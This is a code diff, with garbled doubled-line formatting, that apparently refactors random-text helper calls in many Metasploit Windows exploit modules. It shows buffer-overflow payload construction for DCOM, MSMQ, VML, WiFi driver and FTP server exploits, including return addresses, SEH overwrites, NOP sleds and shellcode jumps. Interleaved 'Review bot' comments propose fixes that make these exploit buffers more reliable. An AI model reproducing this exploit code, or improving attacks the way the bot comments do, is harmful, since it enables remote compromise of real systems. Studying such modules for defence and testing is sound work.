||||||
# Randomize the javascript variable names
|
# Randomize the javascript variable names
|
||||||
rnd = rand(3)
|
rnd = rand(3)
|
||||||
var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
|
var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
|
||||||
var_inp = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_inp = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_tmp = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_tmp = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_payload = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_payload = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_nopslide = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_nopslide = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_slidesize = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_slidesize = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_fillblock = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_fillblock = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_memblock = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_memblock = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_heap = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_heap = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_index = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_index = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_maxIndex = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_maxIndex = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_fillHeap = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_fillHeap = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_start = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_start = "_"+rand_text_alpha(rand(6)+3)
|
||||||
var_timer = "_"+Rex::Text.rand_text_alpha(rand(6)+3)
|
var_timer = "_"+rand_text_alpha(rand(6)+3)
|
||||||
rnd = rand(2)
|
rnd = rand(2)
|
||||||
var_setTimeout = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
|
var_setTimeout = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
|
||||||
var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
|
var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -85,14 +85,14 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
|
||||||
buffer = ("&#x" + addr_word + ";") * buflen
|
buffer = ("&#x" + addr_word + ";") * buflen
|
||||||
|
|
||||||
# Generate a random XML namespace for VML
|
# Generate a random XML namespace for VML
|
||||||
xmlns = Rex::Text.rand_text_alpha(rand(30)+2)
|
xmlns = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Randomize the javascript variable names
|
# Randomize the javascript variable names
|
||||||
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_buffer = rand_text_alpha(rand(30)+2)
|
||||||
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_shellcode = rand_text_alpha(rand(30)+2)
|
||||||
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_unescape = rand_text_alpha(rand(30)+2)
|
||||||
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_x = rand_text_alpha(rand(30)+2)
|
||||||
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_i = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Build out the message
|
# Build out the message
|
||||||
content = %Q|
|
content = %Q|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,16 +70,16 @@ class Exploits::Windows::Browser::MS06_057_WebView_SetSlice < Msf::Exploit::Remo
|
||||||
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
|
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
|
||||||
|
|
||||||
# Randomize the javascript variable names
|
# Randomize the javascript variable names
|
||||||
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_buffer = rand_text_alpha(rand(30)+2)
|
||||||
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_shellcode = rand_text_alpha(rand(30)+2)
|
||||||
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_unescape = rand_text_alpha(rand(30)+2)
|
||||||
var_x = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_x = rand_text_alpha(rand(30)+2)
|
||||||
var_i = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_i = rand_text_alpha(rand(30)+2)
|
||||||
var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_tic = rand_text_alpha(rand(30)+2)
|
||||||
var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_toc = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Randomize HTML data
|
# Randomize HTML data
|
||||||
html = Rex::Text.rand_text_alpha(rand(30)+2)
|
html = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
# Build out the message
|
# Build out the message
|
||||||
content = %Q|
|
content = %Q|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -93,7 +93,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
"<script>" +
|
"<script>" +
|
||||||
"document.location='" +
|
"document.location='" +
|
||||||
get_resource + '/' +
|
get_resource + '/' +
|
||||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
rand_text_alphanumeric(rand(80)+16) +
|
||||||
".pls'</script>" +
|
".pls'</script>" +
|
||||||
"One second please...</body></html>"
|
"One second please...</body></html>"
|
||||||
send_response_html(cli, html)
|
send_response_html(cli, html)
|
||||||
|
@ -115,7 +115,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
pcnt = rand(10)+10;
|
pcnt = rand(10)+10;
|
||||||
|
|
||||||
file = Rex::Text.rand_text_english(1026)
|
file = rand_text_english(1026)
|
||||||
file[1022 , 4] = [target.ret].pack('V')
|
file[1022 , 4] = [target.ret].pack('V')
|
||||||
file[0, payload.encoded.length] = payload.encoded
|
file[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
|
@ -130,7 +130,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_space
|
def generate_space
|
||||||
if datastore['PlaylistSpaceInjection'] == true
|
if datastore['PlaylistSpaceInjection'] == true
|
||||||
return Rex::Text.rand_text(rand(100)+1, nil, " \t")
|
return rand_text(rand(100)+1, nil, " \t")
|
||||||
else
|
else
|
||||||
return ''
|
return ''
|
||||||
end
|
end
|
||||||
|
@ -138,7 +138,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_song(id, file)
|
def generate_song(id, file)
|
||||||
return generate_line("File#{id}", file) +
|
return generate_line("File#{id}", file) +
|
||||||
generate_line("Title#{id}", Rex::Text.rand_text_alphanumeric(rand(64)+1)) +
|
generate_line("Title#{id}", rand_text_alphanumeric(rand(64)+1)) +
|
||||||
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
|
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -149,7 +149,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
|
||||||
def generate_songs(cnt)
|
def generate_songs(cnt)
|
||||||
songs = ''
|
songs = ''
|
||||||
1.upto(cnt) do |i|
|
1.upto(cnt) do |i|
|
||||||
songs << generate_song(i, Rex::Text.rand_text_alphanumeric(rand(64)+1))
|
songs << generate_song(i, rand_text_alphanumeric(rand(64)+1))
|
||||||
end
|
end
|
||||||
return songs
|
return songs
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,10 +66,10 @@ class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote
|
||||||
# Re-generate the payload
|
# Re-generate the payload
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
drv = Rex::Text.rand_text_alpha_upper(1)
|
drv = rand_text_alpha_upper(1)
|
||||||
ext = Rex::Text.rand_text_alpha_upper(3)
|
ext = rand_text_alpha_upper(3)
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alpha_upper(498) + [ target.ret ].pack('V')
|
sploit = rand_text_alpha_upper(498) + [ target.ret ].pack('V')
|
||||||
sploit << make_nops(40) + payload.encoded
|
sploit << make_nops(40) + payload.encoded
|
||||||
|
|
||||||
# Build the stream format
|
# Build the stream format
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
print_status("Bound to #{handle} ...")
|
print_status("Bound to #{handle} ...")
|
||||||
|
|
||||||
# Carefully create the combination of addresses and code for cross-os exploitation
|
# Carefully create the combination of addresses and code for cross-os exploitation
|
||||||
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
|
xpseh = rand_text_alphanumeric(360, payload_badchars)
|
||||||
|
|
||||||
# Jump to [esp-4] - (distance to shellcode)
|
# Jump to [esp-4] - (distance to shellcode)
|
||||||
jmpsc =
|
jmpsc =
|
||||||
|
@ -137,7 +137,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
|
|
||||||
nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
|
nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
|
||||||
Rex::Text.rand_text(2, payload_badchars)
|
rand_text(2, payload_badchars)
|
||||||
|
|
||||||
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
|
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
|
||||||
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
|
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
|
||||||
|
@ -149,7 +149,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
nt4sp3jmpback
|
nt4sp3jmpback
|
||||||
|
|
||||||
# Pad to the magic value of 118 bytes
|
# Pad to the magic value of 118 bytes
|
||||||
ntshiz += Rex::Text.rand_text(118 - ntshiz.length, payload_badchars)
|
ntshiz += rand_text(118 - ntshiz.length, payload_badchars)
|
||||||
|
|
||||||
# Create the evil UNC path used in the overflow
|
# Create the evil UNC path used in the overflow
|
||||||
uncpath =
|
uncpath =
|
||||||
|
@ -165,13 +165,13 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
[ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0
|
[ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0
|
||||||
make_nops(88) +
|
make_nops(88) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
Rex::Text.rand_text(4, payload_badchars) +
|
rand_text(4, payload_badchars) +
|
||||||
make_nops(8) +
|
make_nops(8) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
make_nops(4) +
|
make_nops(4) +
|
||||||
Rex::Arch::X86.jmp_short(4) +
|
Rex::Arch::X86.jmp_short(4) +
|
||||||
Rex::Text.rand_text(4, payload_badchars) +
|
rand_text(4, payload_badchars) +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
ntshiz +
|
ntshiz +
|
||||||
xpseh +
|
xpseh +
|
||||||
|
@ -184,7 +184,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
|
|
||||||
Rex::Text.rand_text(16) +
|
rand_text(16) +
|
||||||
|
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
NDR.long(0) +
|
NDR.long(0) +
|
||||||
|
|
|
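Review bot: `ntshiz += rand_text(118 - ntshiz.length, payload_badchars)` (hunk at -149) hands a negative length to rand_text if `ntshiz` ever exceeds 118 bytes; `ntshiz` is assembled between the hunks, so that bound cannot be confirmed from here. A guard such as `raise RuntimeError, "NT jump block exceeds 118 bytes" if ntshiz.length > 118` directly above the padding line would turn a silently wrong buffer into a clear failure. Separately, `rand_text(16)` in the last hunk is the only random filler in this file built without `payload_badchars`; if that is deliberate because the field never reaches the overflowed path, a short comment on that line saying so would stop the next reader from "fixing" it.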
@ -103,7 +103,7 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
|
||||||
queue_hlen = datastore['HNAME'].length * 2
|
queue_hlen = datastore['HNAME'].length * 2
|
||||||
queue_path = unicode(queue_name + "\\PRIVATE$\\")
|
queue_path = unicode(queue_name + "\\PRIVATE$\\")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(4000, payload_badchars)
|
buf = rand_text_english(4000, payload_badchars)
|
||||||
|
|
||||||
# Windows 2000 SEH offset goes first
|
# Windows 2000 SEH offset goes first
|
||||||
buf[332 + queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
|
buf[332 + queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -175,7 +175,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
|
|
||||||
# timestamp value
|
# timestamp value
|
||||||
Rex::Text.rand_text_alphanumeric(8) +
|
rand_text_alphanumeric(8) +
|
||||||
"\x64\x00" + # beacon interval
|
"\x64\x00" + # beacon interval
|
||||||
"\x11\x04" + # capability flags
|
"\x11\x04" + # capability flags
|
||||||
|
|
||||||
|
@ -193,7 +193,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
||||||
"\xff\xe1" + # jmp ecx
|
"\xff\xe1" + # jmp ecx
|
||||||
|
|
||||||
# padding
|
# padding
|
||||||
Rex::Text.rand_text_alphanumeric(79) +
|
rand_text_alphanumeric(79) +
|
||||||
|
|
||||||
# return address
|
# return address
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -164,12 +164,12 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
||||||
|
|
||||||
def create_beacon
|
def create_beacon
|
||||||
|
|
||||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
ssid = rand_text_alphanumeric(6)
|
||||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
bssid = ("\x00" * 2) + rand_text(4)
|
||||||
src = ("\x90" * 4) + "\xeb\x2b"
|
src = ("\x90" * 4) + "\xeb\x2b"
|
||||||
seq = [rand(255)].pack('n')
|
seq = [rand(255)].pack('n')
|
||||||
|
|
||||||
buff = Rex::Text.rand_text(75)
|
buff = rand_text(75)
|
||||||
buff[0, 2] = "\xeb\x49"
|
buff[0, 2] = "\xeb\x49"
|
||||||
buff[71, 4] = [target.ret].pack('V')
|
buff[71, 4] = [target.ret].pack('V')
|
||||||
|
|
||||||
|
@ -181,7 +181,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
||||||
src + # src
|
src + # src
|
||||||
bssid + # bssid
|
bssid + # bssid
|
||||||
seq + # seq
|
seq + # seq
|
||||||
Rex::Text.rand_text(8) + # timestamp value
|
rand_text(8) + # timestamp value
|
||||||
"\x64\x00" + # beacon interval
|
"\x64\x00" + # beacon interval
|
||||||
"\x00\x05" + # capability flags
|
"\x00\x05" + # capability flags
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -167,11 +167,11 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
|
|
||||||
def create_beacon
|
def create_beacon
|
||||||
|
|
||||||
ssid = Rex::Text.rand_text_alphanumeric(16)
|
ssid = rand_text_alphanumeric(16)
|
||||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
bssid = ("\x00" * 2) + rand_text(4)
|
||||||
src = ("\x00" * 2) + Rex::Text.rand_text(4)
|
src = ("\x00" * 2) + rand_text(4)
|
||||||
seq = [rand(255)].pack('n')
|
seq = [rand(255)].pack('n')
|
||||||
stamp = Rex::Text.rand_text(8)
|
stamp = rand_text(8)
|
||||||
|
|
||||||
frame =
|
frame =
|
||||||
"\x80" + # type/subtype
|
"\x80" + # type/subtype
|
||||||
|
@ -183,7 +183,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
seq + # seq
|
seq + # seq
|
||||||
stamp + # timestamp value
|
stamp + # timestamp value
|
||||||
"\x64\x00" + # beacon interval
|
"\x64\x00" + # beacon interval
|
||||||
Rex::Text.rand_text(2) + # capability flags
|
rand_text(2) + # capability flags
|
||||||
|
|
||||||
# ssid tag
|
# ssid tag
|
||||||
"\x00" + ssid.length.chr + ssid +
|
"\x00" + ssid.length.chr + ssid +
|
||||||
|
@ -202,7 +202,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
"\xff\xe7" # jmp edi
|
"\xff\xe7" # jmp edi
|
||||||
|
|
||||||
# Overwrite enough to pop the return
|
# Overwrite enough to pop the return
|
||||||
buf = Rex::Text.rand_text(1160)
|
buf = rand_text(1160)
|
||||||
|
|
||||||
# Kernel-mode stager fun goes here
|
# Kernel-mode stager fun goes here
|
||||||
buf[0, payload.encoded.length] = payload.encoded
|
buf[0, payload.encoded.length] = payload.encoded
|
||||||
|
@ -214,7 +214,7 @@ class Exploits::Windows::Driver::Netgear_WiFi_Beacon < Msf::Exploit::Remote
|
||||||
buf[1113, jumper.length] = jumper
|
buf[1113, jumper.length] = jumper
|
||||||
|
|
||||||
# Pad it out to be a valid set of IEs
|
# Pad it out to be a valid set of IEs
|
||||||
frame << ie_padding(buf) {|c| Rex::Text.rand_text(c) }
|
frame << ie_padding(buf) {|c| rand_text(c) }
|
||||||
|
|
||||||
return frame
|
return frame
|
||||||
end
|
end
|
||||||
|
|
|
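Review bot: `buf[0, payload.encoded.length] = payload.encoded` (hunk at -202) followed by `buf[1113, jumper.length] = jumper` (hunk at -214) has no check that the payload stays below offset 1113, so a payload longer than that is partially overwritten by the jumper without any error. If the module's payload `Space` limit (declared outside the hunk) guarantees this, a comment on the copy line such as `# payload must stay below the jumper at offset 1113 (enforced by Payload Space)` would document the layout of the 1160-byte buffer; otherwise a length check is warranted. create_beacon opens in the hunk at -167 and closes at `return frame` in the last hunk.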
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -94,7 +94,7 @@ class Exploits::Windows::Ftp::ThreeCeeDaemonFTPUserOverflow < Msf::Exploit::Remo
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(2048, payload_badchars)
|
buf = rand_text_english(2048, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[229, seh.length] = seh
|
buf[229, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,7 +68,7 @@ class Exploits::Windows::Ftp::Cesarftp_Mkd < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect_login
|
connect_login
|
||||||
|
|
||||||
sploit = "\n" * 671 + Rex::Text.rand_text_english(3, payload_badchars)
|
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
|
||||||
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
|
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,8 +70,8 @@ class Exploits::Windows::Ftp::Freeftpd_key_exchange < Msf::Exploit::Remote
|
||||||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
|
||||||
|
|
||||||
res = sock.recv(40)
|
res = sock.recv(40)
|
||||||
if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
|
if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -92,7 +92,7 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(1816, payload_badchars)
|
buf = rand_text_english(1816, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[1008, seh.length] = seh
|
buf[1008, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -107,7 +107,7 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
|
||||||
# R push edx
|
# R push edx
|
||||||
# \x20\xC0 and al, al
|
# \x20\xC0 and al, al
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
buf = rand_text_english(8192, payload_badchars)
|
||||||
buf[0, 1] = "\xc0"
|
buf[0, 1] = "\xc0"
|
||||||
buf[1, payload.encoded.length] = payload.encoded
|
buf[1, payload.encoded.length] = payload.encoded
|
||||||
buf[1014, 4] = [ target.ret ].pack('V')
|
buf[1014, 4] = [ target.ret ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -80,8 +80,8 @@ class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
usr = Rex::Text.rand_text_english(rand(8)+1, payload_badchars)
|
usr = rand_text_english(rand(8)+1, payload_badchars)
|
||||||
buf = Rex::Text.rand_text_english(1292, payload_badchars)
|
buf = rand_text_english(1292, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[442, seh.length] = seh
|
buf[442, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -81,7 +81,7 @@ class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(1130, payload_badchars)
|
buf = rand_text_english(1130, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
buf[322, seh.length] = seh
|
buf[322, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_alphanumeric(8192)
|
buf = rand_text_alphanumeric(8192)
|
||||||
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
||||||
buf[514, 4] = [ target.ret ].pack('V')
|
buf[514, 4] = [ target.ret ].pack('V')
|
||||||
buf[518, 4] = [ target.ret ].pack('V')
|
buf[518, 4] = [ target.ret ].pack('V')
|
||||||
|
|
|
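Review bot: `buf[498, 4] = [ 0x7ffd3001 ].pack('V')` writes a bare literal address while the two neighbouring slots at 514 and 518 use `target.ret`, and nothing says what the literal is or which target it is valid for. Either add a comment on that line naming the address's role, or move the value into the target definition next to `ret` so it can vary per target like the other two. The enclosing exploit method starts and ends outside the hunk.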
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -67,7 +67,7 @@ class Exploits::Windows::Ftp::Wsftp_Server_505_Xmd5 < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(676, payload_badchars)
|
sploit = rand_text_alphanumeric(676, payload_badchars)
|
||||||
sploit << [target.ret].pack('V') + payload.encoded
|
sploit << [target.ret].pack('V') + payload.encoded
|
||||||
|
|
||||||
send_cmd( ['XMD5', sploit] , false)
|
send_cmd( ['XMD5', sploit] , false)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,7 +89,7 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
user_cook = Rex::Text.rand_text_alphanumeric(2)
|
user_cook = rand_text_alphanumeric(2)
|
||||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
